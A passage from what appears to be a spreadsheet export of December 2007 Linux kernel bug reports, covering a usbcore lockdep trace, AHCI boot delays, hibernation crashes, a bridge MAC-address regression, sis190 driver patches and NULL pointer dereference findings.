kernel: [&lt;c020431e&gt;] sysenter_past_esp+0x5f/0xa5 Dec 10 14:21:41 better kernel: [&lt;ffffffff&gt;] 0xffffffff Dec 10 14:21:41 better kernel: Dec 10 14:21:41 better kernel: -&gt; #3 (rtnl_mutex){--..}: Dec 10 14:21:41 better kernel: [&lt;c0240980&gt;] __lock_acquire+0xbc0/0x1080 Dec 10 14:21:41 better kernel: [&lt;c03da345&gt;] linkwatch_event+0x5/0x30 Dec 10 14:21:41 better kernel: [&lt;c020ae7f&gt;] save_stack_trace+0x1f/0x40 Dec 10 14:21:41 better kernel: [&lt;c03da345&gt;] linkwatch_event+0x5/0x30 Dec 10 14:21:41 better kernel: [&lt;c0240e9f&gt;] lock_acquire+0x5f/0x80 Dec 10 14:21:41 better kernel: [&lt;c03da345&gt;] linkwatch_event+0x5/0x30 Dec 10 14:21:41 better kernel: [&lt;c043fcdf&gt;] mutex_lock_nested+0x7f/0x2f0 Dec 10 14:21:41 better kernel: [&lt;c03da345&gt;] linkwatch_event+0x5/0x30 Dec 10 14:21:41 better kernel: [&lt;c03da340&gt;] linkwatch_event+0x0/0x30 Dec 10 14:21:41 better kernel: [&lt;c03da345&gt;] linkwatch_event+0x5/0x30 Dec 10 14:21:41 better kernel: [&lt;c022f43b&gt;] run_workqueue+0x15b/0x1e0 Dec 10 14:21:41 better kernel: [&lt;c022f3e4&gt;] run_workqueue+0x104/0x1e0 Dec 10 14:21:41 better kernel: [&lt;c022fe82&gt;] worker_thread+0x82/0xe0 Dec 10 14:21:41 better kernel: [&lt;c0233070&gt;] autoremove_wake_function+0x0/0x40 Dec 10 14:21:41 better kernel: [&lt;c022fe00&gt;] worker_thread+0x0/0xe0 Dec 10 14:21:41 better kernel: [&lt;c0232dd2&gt;] kthread+0x42/0x70 Dec 10 14:21:41 better kernel: [&lt;c0232d90&gt;] kthread+0x0/0x70 Dec 10 14:21:41 better kernel: [&lt;c0204f5b&gt;] kernel_thread_helper+0x7/0x1c Dec 10 14:21:41 better kernel: [&lt;ffffffff&gt;] 0xffffffff Dec 10 14:21:41 better kernel: Dec 10 14:21:41 better kernel: -&gt; #2 ((linkwatch_work).work){--..}: Dec 10 14:21:41 better kernel: [&lt;c0240980&gt;] __lock_acquire+0xbc0/0x1080 Dec 10 14:21:41 better kernel: [&lt;c022f3e4&gt;] run_workqueue+0x104/0x1e0 Dec 10 14:21:41 better kernel: [&lt;c03da340&gt;] linkwatch_event+0x0/0x30 Dec 10 14:21:41 better kernel: [&lt;c0240e9f&gt;] lock_acquire+0x5f/0x80 Dec 10 14:21:41 better kernel: [&lt;c022f3e4&gt;] run_workqueue+0x104/0x1e0 Dec 10 14:21:41 better kernel: [&lt;c022f437&gt;] run_workqueue+0x157/0x1e0 Dec 10 14:21:41 better kernel: [&lt;c022f3e4&gt;] run_workqueue+0x104/0x1e0 Dec 10 14:21:41 better kernel: [&lt;c022fe82&gt;] worker_thread+0x82/0xe0 Dec 10 14:21:41 better kernel: [&lt;c0233070&gt;] autoremove_wake_function+0x0/0x40 Dec 10 14:21:41 better kernel: [&lt;c022fe00&gt;] worker_thread+0x0/0xe0 Dec 10 14:21:41 better kernel: [&lt;c0232dd2&gt;] kthread+0x42/0x70 Dec 10 14:21:41 better kernel: [&lt;c0232d90&gt;] kthread+0x0/0x70 Dec 10 14:21:41 better kernel: [&lt;c0204f5b&gt;] kernel_thread_helper+0x7/0x1c Dec 10 14:21:41 better kernel: [&lt;ffffffff&gt;] 0xffffffff Dec 10 14:21:41 better kernel: Dec 10 14:21:41 better kernel: -&gt; #1 (events){--..}: Dec 10 14:21:41 better kernel: [&lt;c0240980&gt;] __lock_acquire+0xbc0/0x1080 Dec 10 14:21:41 better kernel: [&lt;c022fa80&gt;] flush_workqueue+0x0/0x70 Dec 10 14:21:41 better kernel: [&lt;c043fdec&gt;] mutex_lock_nested+0x18c/0x2f0 Dec 10 14:21:41 better kernel: [&lt;c023f86f&gt;] trace_hardirqs_on+0xaf/0x160 Dec 10 14:21:41 better kernel: [&lt;c0240e9f&gt;] lock_acquire+0x5f/0x80 Dec 10 14:21:41 better kernel: [&lt;c022fa80&gt;] flush_workqueue+0x0/0x70 Dec 10 14:21:41 better kernel: [&lt;c022fac3&gt;] flush_workqueue+0x43/0x70 Dec 10 14:21:41 better kernel: [&lt;c022fa80&gt;] flush_workqueue+0x0/0x70 Dec 10 14:21:41 better kernel: [&lt;f8d04338&gt;] hub_suspend+0x48/0x50 [usbcore] Dec 10 14:21:41 better kernel: [&lt;f8d04340&gt;] hub_resume+0x0/0x10 [usbcore] Dec 10 14:21:41 better kernel: [&lt;f8d09c18&gt;] usb_suspend_both+0xc8/0x2f0 [usbcore] Dec 10 14:21:41 better kernel: [&lt;f8d0984b&gt;] usb_autopm_do_device+0x2b/0x110 [usbcore] Dec 10 14:21:41 better kernel: [&lt;f8d098e4&gt;] usb_autopm_do_device+0xc4/0x110 [usbcore] Dec 10 14:21:41 better kernel: [&lt;f8d09f70&gt;] usb_autosuspend_work+0x0/0x10 [usbcore] Dec 10 14:21:41 better kernel: [&lt;f8d09f70&gt;] usb_autosuspend_work+0x0/0x10 [usbcore] Dec 10 14:21:41 better kernel: [&lt;c022f43b&gt;] run_workqueue+0x15b/0x1e0 Dec 10 14:21:41 better kernel: [&lt;c022f3e4&gt;] run_workqueue+0x104/0x1e0 Dec 10 14:21:41 better kernel: [&lt;c022fe82&gt;] worker_thread+0x82/0xe0 Dec 10 14:21:41 better kernel: [&lt;c0233070&gt;] autoremove_wake_function+0x0/0x40 Dec 10 14:21:41 better kernel: [&lt;c022fe00&gt;] worker_thread+0x0/0xe0 Dec 10 14:21:41 better kernel: [&lt;c0232dd2&gt;] kthread+0x42/0x70 Dec 10 14:21:41 better kernel: [&lt;c0232d90&gt;] kthread+0x0/0x70 Dec 10 14:21:41 better kernel: [&lt;c0204f5b&gt;] kernel_thread_helper+0x7/0x1c Dec 10 14:21:41 better kernel: [&lt;ffffffff&gt;] 0xffffffff Dec 10 14:21:41 better kernel: Dec 10 14:21:41 better kernel: -&gt; #0 (&amp;dev-&gt;pm_mutex){--..}: Dec 10 14:21:41 better kernel: [&lt;c02407ab&gt;] __lock_acquire+0x9eb/0x1080 Dec 10 14:21:41 better kernel: [&lt;f8d0984b&gt;] usb_autopm_do_device+0x2b/0x110 [usbcore] Dec 10 14:21:41 better kernel: [&lt;c0240e9f&gt;] lock_acquire+0x5f/0x80 Dec 10 14:21:41 better kernel: [&lt;f8d0984b&gt;] usb_autopm_do_device+0x2b/0x110 [usbcore] Dec 10 14:21:41 better kernel: [&lt;c043fcdf&gt;] mutex_lock_nested+0x7f/0x2f0 Dec 10 14:21:41 better kernel: [&lt;f8d0984b&gt;] usb_autopm_do_device+0x2b/0x110 [usbcore] Dec 10 14:21:41 better kernel: [&lt;f8d0984b&gt;] usb_autopm_do_device+0x2b/0x110 [usbcore] Dec 10 14:21:41 better kernel: [&lt;f8d034ee&gt;] usb_disconnect+0x12e/0x140 [usbcore] Dec 10 14:21:41 better kernel: [&lt;f8d049d0&gt;] hub_thread+0x460/0xcb0 [usbcore] Dec 10 14:21:41 better kernel: [&lt;c04413bb&gt;] _spin_unlock_irq+0x2b/0x50 Dec 10 14:21:41 better kernel: [&lt;c021b2db&gt;] finish_task_switch+0x5b/0xb0 Dec 10 14:21:41 better kernel: [&lt;c0233070&gt;] autoremove_wake_function+0x0/0x40 Dec 10 14:21:41 better kernel: [&lt;f8d04570&gt;] hub_thread+0x0/0xcb0 [usbcore] Dec 10 14:21:41 better kernel: [&lt;c0232dd2&gt;] kthread+0x42/0x70 Dec 10 14:21:41 better kernel: [&lt;c0232d90&gt;] kthread+0x0/0x70 Dec 10 14:21:41 better kernel: [&lt;c0204f5b&gt;] kernel_thread_helper+0x7/0x1c Dec 10 14:21:41 better kernel: [&lt;ffffffff&gt;] 0xffffffff Dec 10 14:21:41 better kernel: Dec 10 14:21:41 better kernel: other info that might help us debug this: Dec 10 14:21:41 better kernel: Dec 10 14:21:41 better kernel: 1 lock held by khubd/680: Dec 10 14:21:41 better kernel: #0: (&amp;dev-&gt;pm_mutex/1){--..}, at: [&lt;f8d034b1&gt;] usb_disconnect+0xf1/0x140 [usbcore] Dec 10 14:21:41 better kernel: Dec 10 14:21:41 better kernel: stack backtrace: Dec 10 14:21:41 better kernel: Pid: 680, comm: khubd Not tainted 2.6.24-rc4-lg #1 Dec 10 14:21:41 better kernel: [&lt;c023eb4a&gt;] print_circular_bug_tail+0x7a/0x90 Dec 10 14:21:41 better kernel: [&lt;c02407ab&gt;] __lock_acquire+0x9eb/0x1080 Dec 10 14:21:41 better kernel: [&lt;f8d0984b&gt;] usb_autopm_do_device+0x2b/0x110 [usbcore] Dec 10 14:21:41 better kernel: [&lt;c0240e9f&gt;] lock_acquire+0x5f/0x80 Dec 10 14:21:41 better kernel: [&lt;f8d0984b&gt;] usb_autopm_do_device+0x2b/0x110 [usbcore] Dec 10 14:21:41 better kernel: [&lt;c043fcdf&gt;] mutex_lock_nested+0x7f/0x2f0 Dec 10 14:21:41 better kernel: [&lt;f8d0984b&gt;] usb_autopm_do_device+0x2b/0x110 [usbcore] Dec 10 14:21:41 better kernel: [&lt;f8d0984b&gt;] usb_autopm_do_device+0x2b/0x110 [usbcore] Dec 10 14:21:41 better kernel: [&lt;f8d034ee&gt;] usb_disconnect+0x12e/0x140 [usbcore] Dec 10 14:21:41 better kernel: [&lt;f8d049d0&gt;] hub_thread+0x460/0xcb0 [usbcore] Dec 10 14:21:41 better kernel: [&lt;c04413bb&gt;] _spin_unlock_irq+0x2b/0x50 Dec 10 14:21:41 better kernel: [&lt;c021b2db&gt;] finish_task_switch+0x5b/0xb0 Dec 10 14:21:41 better kernel: [&lt;c0233070&gt;] autoremove_wake_function+0x0/0x40 Dec 10 14:21:41 better kernel: [&lt;f8d04570&gt;] hub_thread+0x0/0xcb0 [usbcore] Dec 10 14:21:41 better kernel: [&lt;c0232dd2&gt;] kthread+0x42/0x70 Dec 10 14:21:41 better kernel: [&lt;c0232d90&gt;] kthread+0x0/0x70 Dec 10 14:21:41 better kernel: [&lt;c0204f5b&gt;] kernel_thread_helper+0x7/0x1c Dec 10 14:21:41 better kernel: =======================</t>
  </si>
  <si>
    <t>2.6.24-rc4: some ahci/acpi interaction causes delays during boot</t>
  </si>
  <si>
    <t>2007-12-10 05:55 UTC</t>
  </si>
  <si>
    <t>PaX Team</t>
  </si>
  <si>
    <t>2007-12-20 16:02 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: didn't test but 2.6.23 worked fine Distribution: gentoo but doesn't matter as the kernel doesn't get to userland yet ;) Hardware Environment: hp nc8430 Software Environment: Problem Description: booting with 2.6.24-rc4 causes the following errors/messages while initializing sata/ahci: [ 26.494962] ahci 0000:00:1f.2: version 3.0 [ 26.494982] ACPI: PCI Interrupt 0000:00:1f.2[B] -&gt; GSI 17 (level, low) -&gt; IRQ 17 [ 26.495344] ahci 0000:00:1f.2: nr_ports (4) and implemented port map (0x1) don't match, using nr_ports [ 26.495566] ahci 0000:00:1f.2: forcing PORTS_IMPL to 0xf [ 27.498361] ahci 0000:00:1f.2: AHCI 0001.0100 32 slots 4 ports 1.5 Gbps 0xf impl SATA mode [ 27.498583] ahci 0000:00:1f.2: flags: 64bit ncq ilck stag pm led clo pmp pio slum part [ 27.498806] PCI: Setting latency timer of device 0000:00:1f.2 to 64 [ 27.499023] scsi0 : ahci [ 27.499241] scsi1 : ahci [ 27.499456] scsi2 : ahci [ 27.499667] scsi3 : ahci [ 27.499892] ata1: SATA max UDMA/133 abar m1024@0xf4705000 port 0xf4705100 irq 219 [ 27.500112] ata2: SATA max UDMA/133 abar m1024@0xf4705000 port 0xf4705180 irq 219 [ 27.500332] ata3: SATA max UDMA/133 abar m1024@0xf4705000 port 0xf4705200 irq 219 [ 27.501822] ata4: SATA max UDMA/133 abar m1024@0xf4705000 port 0xf4705280 irq 219 [ 28.137999] ata1: SATA link up 1.5 Gbps (SStatus 113 SControl 300) next comes the first failure: [ 28.140561] ata1.00: ACPI cmd b1/c1:00:00:00:00:a0 failed (Emask=0x1 Stat=0x51 Err=0x04) [ 28.141091] ata1: failed to recover some devices, retrying in 5 secs [ 34.786461] ata1: SATA link up 1.5 Gbps (SStatus 113 SControl 300) [ 34.789004] ata1.00: ACPI cmd b1/c1:00:00:00:00:a0 failed (Emask=0x1 Stat=0x51 Err=0x04) then the second failure: [ 34.789534] ata1.00: ACPI on devcfg failed the second time, disabling (errno=-5) [ 34.789753] ata1.00: revalidation failed (errno=1) [ 34.789914] ata1: failed to recover some devices, retrying in 5 secs [ 41.434924] ata1: SATA link up 1.5 Gbps (SStatus 113 SControl 300) [ 41.437002] ata1.00: configured for UDMA/100 after this the driver works and boot proceeds fine. so it's not a show stopper for me but something isn't right. also i'm not sure if it's really an ACPI problem, but it was some ACPI command that was last issued/logged so i thought it'd put this under ACPI, feel free to reclassify. if you need any extra info, let me know but i'd like to avoid bisecting if possible. Steps to reproduce: just compile/boot with 2.6.24-rc4.</t>
  </si>
  <si>
    <t>pnpacpi: exceeded the max number of IO resources: 24</t>
  </si>
  <si>
    <t>2007-12-10 12:35 UTC</t>
  </si>
  <si>
    <t>2008-03-26 09:37 UTC</t>
  </si>
  <si>
    <t>hi, During boot I get these error: pnpacpi: exceeded the max number of IO resources: 24 I have an Acer TravelMate 8000 Running under Ubuntu hardy (dev version) This is a regression since I don't get these warning with 2.6.22</t>
  </si>
  <si>
    <t>BUG fs/dcache.c:595 in 2.4.24rc3-git3 during NFS umount</t>
  </si>
  <si>
    <t>2.4.24rc3-git3</t>
  </si>
  <si>
    <t>2007-12-10 13:32 UTC</t>
  </si>
  <si>
    <t>2007-12-17 15:55 UTC</t>
  </si>
  <si>
    <t>Subject : BUG fs/dcache.c:595 in 2.4.24rc3-git3 during NFS umount Submitter : Andi Kleen &lt;ak@suse.de&gt; References : http://lkml.org/lkml/2007/12/8/58 Handled-By : Trond Myklebust &lt;trond.myklebust@fys.uio.no&gt;</t>
  </si>
  <si>
    <t>System reboots after restoring hibernation image (s2disk)</t>
  </si>
  <si>
    <t>2007-12-11 02:11 UTC</t>
  </si>
  <si>
    <t>Adam Jones</t>
  </si>
  <si>
    <t>2007-12-20 16:04 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.20.1 Distribution: Gentoo Hardware Environment: Dell XPS M1210 (Intel T7200; 1GB RAM) Software Environment: x86_64 SMP kernel; no driver modules loaded init=/bin/bash ; no daemons running s2disk (suspend) 0.9_pre20071208 Problem Description: Hibernation with s2disk appears to work correctly - image is saved, and the system powers down. When resuming, the image is loaded (via the resume utility from an initrd), at which point the screen goes blank and the machine reboots after a brief delay. The image creation step appears to work correctly even from within X, but resume always fails. Steps to reproduce: Boot with init=/bin/bash (and resume utility run from /linuxrc in initrd) s2disk Power on and resume with same kernel.</t>
  </si>
  <si>
    <t>Kernel oops in swsusp_save on suspend (IOMMU-related)</t>
  </si>
  <si>
    <t>2007-12-11 05:30 UTC</t>
  </si>
  <si>
    <t>Alexandre Julliard</t>
  </si>
  <si>
    <t>2009-04-02 04:55 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: n/a Distribution: Debian sid Hardware Environment: AMD athlon 64 X2 dual core with 4Gb RAM, chipset nForce 500 SLI Software Environment: Linux wine.dyndns.org 2.6.23.8-gb506e24f-dirty #9 SMP Tue Dec 11 11:00:48 CET 2007 x86_64 GNU/Linux Problem Description: I'm getting a crash in swsusp_save() on suspend, when it tries to access address 0xffff810008000000 (sorry I don't have the full oops, let me know if you want me to copy it down by hand). This address is apparently the first page in the GART IOMMU range: PCI-DMA: Disabling AGP. PCI-DMA: aperture base @ 8000000 size 65536 KB PCI-DMA: using GART IOMMU. PCI-DMA: Reserving 64MB of IOMMU area in the AGP aperture My guess is that the IOMMU aperture range should somehow be skipped when copying. Suspending works fine if I boot with iommu=soft, or with mem=3G.</t>
  </si>
  <si>
    <t>Cannot bring up a bridge interface without a MAC address set</t>
  </si>
  <si>
    <t>2.6.24-0.81.rc4.git7.fc9</t>
  </si>
  <si>
    <t>2007-12-11 11:04 UTC</t>
  </si>
  <si>
    <t>Daniel Berrange</t>
  </si>
  <si>
    <t>2007-12-17 16:02 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: Any 2.6.23 or earlier Distribution: Fedora 9 rawhide Hardware Environment: Intel(R) Core(TM)2 Duo CPU E6850, x86_64 Software Environment: 2.6.24-0.81.rc4.git7.fc9 #1 SMP x86_64 GNU/Linux Problem Description: It is not possible to bring up a bridge interface unless one first assigns a MAC address to it. This is a regression from earlier kernels where one could always bring up a bridge device immediately after creating it. The bridge should not require a MAC address because it is not going to be configured with any IP addr - in my scenario I merely wish to use it to connect a number of 'tap' devices associated with KVM guests. Steps to reproduce: # brctl addbr demobr # ifconfig demobr up SIOCSIFFLAGS: Invalid argument It is failing on the ioctl to bring up the interface ioctl(4, SIOCGIFFLAGS, {ifr_name="demobr", ifr_flags=IFF_BROADCAST|IFF_MULTICAST}) = 0 ioctl(4, SIOCSIFFLAGS, 0x7fff38a6f180) = -1 EINVAL (Invalid argument) The following Fedora kernel BZ has the original problem report: https://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=390991 The problem appears to have been introduced by this patch: Commit bada339ba24dee9e143bfb42e1dc61f146619846 Author: Jeff Garzik &lt;jgarzik@redhat.com&gt; Date: Tue Oct 23 20:19:37 2007 -0700 [NET]: Validate device addr prior to interface-up Signed-off-by: Jeff Garzik &lt;jgarzik@redhat.com&gt; Signed-off-by: David S. Miller &lt;davem@davemloft.net&gt; diff --git a/net/core/dev.c b/net/core/dev.c index 8726589..f861555 100644 --- a/net/core/dev.c +++ b/net/core/dev.c @@ -1007,17 +1007,20 @@ int dev_open(struct net_device *dev) * Call device private open method */ set_bit(__LINK_STATE_START, &amp;dev-&gt;state); - if (dev-&gt;open) { + + if (dev-&gt;validate_addr) + ret = dev-&gt;validate_addr(dev); Which rejects MAC addresses with all 0s Herbert Xu tells me... "This is clearly a bug in the upstream bridge device. It should override the default address validator so that when there are no devices attached that a zero MAC address is allowed."</t>
  </si>
  <si>
    <t>sis190 check for ISA bridge on SiS968</t>
  </si>
  <si>
    <t>2.6.23-42</t>
  </si>
  <si>
    <t>2007-12-12 07:29 UTC</t>
  </si>
  <si>
    <t>Mauro</t>
  </si>
  <si>
    <t>2008-01-24 14:16 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: none Distribution: Fedora 8 Hardware Environment: SiS 191 PCI Gigabit Ethernet adapter. Both are expected to appears in lan on motherboard SiS 968 south bridge. Software Environment: Fedora 8 Problem Description: You ahve to add this lines: + if (!isa_bridge) + isa_bridge = pci_get_device(PCI_VENDOR_ID_SI, 0x0968, NULL); + on si190.c The same problem has been resolved for sis966: Look on: http://bugs.debian.org/435547 drivers/net/sis190.c | 3 +++ 1 files changed, 3 insertions(+), 0 deletions(-) diff --git a/drivers/net/sis190.c b/drivers/net/sis190.c index ec2ad9f..d470b19 100644 --- a/drivers/net/sis190.c +++ b/drivers/net/sis190.c @@ -1593,6 +1593,9 @@ static int __devinit sis190_get_mac_addr_from_apc(struct pci_dev *pdev, pci_name(pdev)); isa_bridge = pci_get_device(PCI_VENDOR_ID_SI, 0x0965, NULL); + if (!isa_bridge) + isa_bridge = pci_get_device(PCI_VENDOR_ID_SI, 0x0966, NULL); + if (!isa_bridge) { net_probe(tp, KERN_INFO "%s: Can not find ISA bridge.\n", pci_name(pdev)); Steps to reproduce: Hardware problem You have to reproduce the problem in a PC with sis968 and Sis191</t>
  </si>
  <si>
    <t>2007-12-12 08:19 UTC</t>
  </si>
  <si>
    <t xml:space="preserve">+++ This bug was initially created as a clone of Bug #9547 +++ Most recent kernel where this bug did not occur: none Distribution: Fedora 8 Hardware Environment: SiS 191 PCI Gigabit Ethernet adapter. Both are expected to appears in lan on motherboard SiS </t>
  </si>
  <si>
    <t>[crash] kernel BUG at drivers/cpufreq/cpufreq.c:1060!</t>
  </si>
  <si>
    <t>2.6.24-rc4-git5</t>
  </si>
  <si>
    <t>2007-12-12 10:33 UTC</t>
  </si>
  <si>
    <t>2007-12-20 16:09 UTC</t>
  </si>
  <si>
    <t>Subject : [crash] kernel BUG at drivers/cpufreq/cpufreq.c:1060! Submitter : Ingo Molnar &lt;mingo@elte.hu&gt; References : http://lkml.org/lkml/2007/12/12/52 Handled-By : Dave Jones &lt;davej@redhat.com&gt;</t>
  </si>
  <si>
    <t>build #340 failed for 2.6.24-rc5-g75b8c13 in linux/drivers/media/video/tuner.ko</t>
  </si>
  <si>
    <t>v4l-core</t>
  </si>
  <si>
    <t>2.6.24-rc5-g75b8c13</t>
  </si>
  <si>
    <t>2007-12-12 10:40 UTC</t>
  </si>
  <si>
    <t>2007-12-17 16:05 UTC</t>
  </si>
  <si>
    <t>v4l-dvb_v4l-core@kernel-bugs.osdl.org</t>
  </si>
  <si>
    <t>Subject : build #340 failed for 2.6.24-rc5-g75b8c13 in linux/drivers/media/video/tuner.ko Submitter : Toralf Förster &lt;toralf.foerster@gmx.de&gt; References : Handled-By : Michael Krufky &lt;mkrufky@linuxtv.org&gt; Mauro Carvalho Chehab &lt;mchehab@infradead.org&gt;</t>
  </si>
  <si>
    <t>PATA_HPT37X embezzles two ports</t>
  </si>
  <si>
    <t>2007-12-12 11:05 UTC</t>
  </si>
  <si>
    <t>2008-01-22 15:55 UTC</t>
  </si>
  <si>
    <t>Subject : PATA_HPT37X embezzles two ports Submitter : "Bjoern Olausson" &lt;lkmlist@gmail.com&gt; References : http://lkml.org/lkml/2007/12/12/161</t>
  </si>
  <si>
    <t>write barriers over device mapper are not supported</t>
  </si>
  <si>
    <t>2007-12-12 13:59 UTC</t>
  </si>
  <si>
    <t>2010-01-14 10:00 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: - Distribution: Debian Etch/Lenny/Sid/Experimental Hardware Environment: IBM ThinkPad T42 with internal harddisk Software Environment: martin@shambala&gt; apt-show-versions | egrep "(xfsprogs|dmsetup|lvm2)" lvm2/sid uptodate 2.02.26-1+b1 xfsprogs/sid uptodate 2.9.4-2 dmsetup/sid uptodate 2:1.02.20-2 The internal harddisk is accessed by libata PATA. Problem Description: Write barriers over device mapper are not supported, which means that write barriers over LVM2 are also not supported. Looking at dm_request() as Eric Sandeen did in a post on the XFS mailing list suggests that there are technical reasons for the lack of write barrier support[1]: martin@shambala&gt; grep -A 9 -m1 "dm_request" linux-2.6.23/drivers/md/dm.c static int dm_request(struct request_queue *q, struct bio *bio) { int r; int rw = bio_data_dir(bio); struct mapped_device *md = q-&gt;queuedata; /* * There is no use in forwarding any barrier request since we can't * guarantee it is (or can be) handled by the targets correctly. */ From a user point of view I actually would like write barrier support with device mapper and the dm application LVM2 regardless of any technical difficulties. And fail to see the point of write barriers when half the kernel actually doesn't support it. Using write barriers helped a lot with stability of XFS on unclean filesystem shutdowns. And even with ext3 which seems to be less vunerable IO to out of order IO requests, well with any journalling filesystem write barriers should help stability on commodity hardware. Is write barrier support for device mapper, at least with LVM2, planned? IMHO there should be a way that allow dm targets to report whether they can handle barrier requests. [1] http://oss.sgi.com/archives/xfs/2007-12/msg00080.html Steps to reproduce: Mounting an ext3 from a logical volume (LVM 2) with -o barrier=1 and touching a file gives: JBD: barrier-based sync failed on dm-0 - disabling barriers Mounting a XFS from a logical volume gives: Filesystem "dm-0": Disabling barriers, not supported by the underlying device Mounting a reiserfs from a logical volume gives: reiserfs: using flush barriers [...] reiserfs: disabling flush barriers on dm-2</t>
  </si>
  <si>
    <t>Suspend to RAM horks keyboard autorepeat, system bell, trackpad</t>
  </si>
  <si>
    <t>2007-12-12 18:18 UTC</t>
  </si>
  <si>
    <t>Akkana Peck</t>
  </si>
  <si>
    <t>2008-09-23 07:29 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.23.1 Distribution: Ubuntu feisty Hardware Environment: Sony Vaio SR71 Software Environment: Problem Description: With 2.6.23.8, when I suspend to RAM (using /usr/sbin/hibernate -F /etc/hibernate/ram.conf) from within X, when I resume I see the following odd behavior: 1. The system bell is now half a second long. 2. Keyboard autorepeat has a very long delay -- like 7 seconds before the first repeated character shows up. 3. If I configure X to use the (Alps) trackpad via the synaptics driver, after resuming, clicks from the trackpad don't work at all -- not only are taps ignored (which is how I've configured xorg.conf) but the physical buttons don't generate click events either. If I configure X to use the trackpad just as a PS/2 mouse, though, it still works normally after resuming. 2.6.23.1 with the same .config (I took the .config from 23.8, copied it into the 23.1 directory, and ran make oldconfig) does NOT exhibit any of these problems -- it resumes from suspend normally and everything still works. Steps to reproduce: Boot 2.6.23.8. Log in, start X, suspend, resume. Hold down the return key and observe no autorepeat (at least for a long time). echo ^G and hear the long bell. xorg.conf to test the trackpad part available upon request. I will attach my .configs from 23.1 and 23.8. I've tried with and without evdev, and with and without tickless, so neither of those is to blame. I wanted to try turning off the synaptic driver, but it seems to be a mandatory part of the PS/2 mouse driver now. I'm happy to try other configuration options. It's possible this is related to bug 7977, but that one is from 2.6.21 and is supposedly fixed now, and nobody there mentioned the keyboard or bell aspects.</t>
  </si>
  <si>
    <t>AE_AML_PACKAGE_LIMIT, Evaluating _PSS - Frequency scaling not working after BIOS upgrade on Asus F3jc</t>
  </si>
  <si>
    <t>2.6.23.1-custom</t>
  </si>
  <si>
    <t>2007-12-13 22:58 UTC</t>
  </si>
  <si>
    <t>Giovanni Toraldo</t>
  </si>
  <si>
    <t>2008-05-21 17:18 UTC</t>
  </si>
  <si>
    <t>8298 10299</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: n/a Distribution: Debian GNU/Linux Hardware Environment: Asus F3jc Software Environment: n/a Problem Description: Frequency scaling is not working after bios version 206 on my Asus f3jc laptop (and probably on many others Asus laptops) Steps to reproduce: BIOS images are located here -&gt; ftp://dlsvr01.asus.com/pub/ASUS/nb/F3Jc/ (mostly down, at 5 o'clock is the right time to login :p) /etc/init.d/powernowd: 156: cannot create /sys/devices/system/cpu/cpu0//cpufreq/scaling_governor: Directory nonexistent * CPU frequency scaling not supported</t>
  </si>
  <si>
    <t>powernow-k8 cpuid c0f13 not supported w/ fx-74 CPUs</t>
  </si>
  <si>
    <t>2.6.24-rc4-git6</t>
  </si>
  <si>
    <t>2007-12-14 09:45 UTC</t>
  </si>
  <si>
    <t>Dmitry Savchenko</t>
  </si>
  <si>
    <t>2007-12-14 12:12 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: unknown Distribution: gcc version 4.1.2 (Gentoo 4.1.2 p1.0.2) Hardware Environment: 2xAMD Athlon FX-74 CPUs on ASUS L1N64-SLI WS NF680a 1207 MB Software Environment: gentoo Problem Description: While trying to enable Cool'n'Quiet, dmesg error with: powernow-k8: Processor cpuid c0f13 not supported powernow-k8: Processor cpuid c0f13 not supported powernow-k8: Processor cpuid c0f13 not supported powernow-k8: Processor cpuid c0f13 not supported Tried w/ powernow-k8 build as a module as well as build into kernel... same result. Steps to reproduce: 1. compile kernel with powernow-k8 support 2. boot on Athlon FX-74 CPU</t>
  </si>
  <si>
    <t>USB subsystem confuses serial devices with ehci controller</t>
  </si>
  <si>
    <t>2007-12-14 10:37 UTC</t>
  </si>
  <si>
    <t>2008-09-26 07:12 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: Distribution: Gentoo Hardware Environment: Software Environment: Problem Description: I am trying to use a PCMCIA PC-CARD GPRS/UMTS/HSDPA MODEM PC-CARD is branded as ONDA H600 and is extremely popular in Italy since it is the "default" UMTS PC-CARD by a provider in the country. PC-CARD is actually a re-branded ZTE MF330 so it should be quite popular in other countries as well. Apparently, also the older ONDA NH501HS is again a ZTE MF330, so the following should apply also to that card. When the card is inserted into the PCMCIA slot, the following should happen: - kernel should recognize an OHCI Host Controller - kernel should recognize an ONDA CDMA Technologies MSM (Manufacturer: Qualcomm, Incorporated) attached to it - kernel should configure 3 ttyUSB devices provided by the 3 serial interfaces of the ONDA MSM Unfortunately, with the linux kernel this does not happen Rather, the kernel gets confused, detects an EHCI Controller, loads the kernel module for it and no serial interfaces appear. As an hack, the correct behaviour can be obtained by blacklisting the ehci_hcd for instance in /etc/modprobe.d/blacklist-modem. When the ehci_hcd is blacklisted everything works correctly and the ONDA Wireless UMTS PC-CARD gets perfectly usable. lspci reports the datacard as a Philips ISP1561 EHCI USB 2.0 (1131:1562), so I excluded this device from ehci-pci and i can use the datacard without blacklisting the module. Steps to reproduce:</t>
  </si>
  <si>
    <t>NULL pointer dereference on drivers/usb/host/ehci-q.c</t>
  </si>
  <si>
    <t>2007-12-14 19:24 UTC</t>
  </si>
  <si>
    <t>There is a NULL pointer dereference at drivers/usb/host/ehci-q.c, line 742. The pointer that is null at that line is urb-&gt;dev-&gt;tt. The reason for the error is as follows: (1) Assume the if-condition at line 663 is true (2) assume the if-condition at line 668 is false (3) assume the ?-condition at line 699 is false. Then it must be the case that "tt" is NULL. But this implies that urb-&gt;dev-&gt;tt is also NULL at line 683, which reads "struct usb_tt *tt = urb-&gt;dev-&gt;tt;" (4) the first disjunct at the "if" statement on line 731 evaluates to true (5) the statement at line 742 executes with urb-&gt;dev-&gt;tt NULL.</t>
  </si>
  <si>
    <t>Dereferencing NULL pointer on drivers/usb/serial/mos7720.c</t>
  </si>
  <si>
    <t>2007-12-15 06:53 UTC</t>
  </si>
  <si>
    <t>2008-09-22 10:42 UTC</t>
  </si>
  <si>
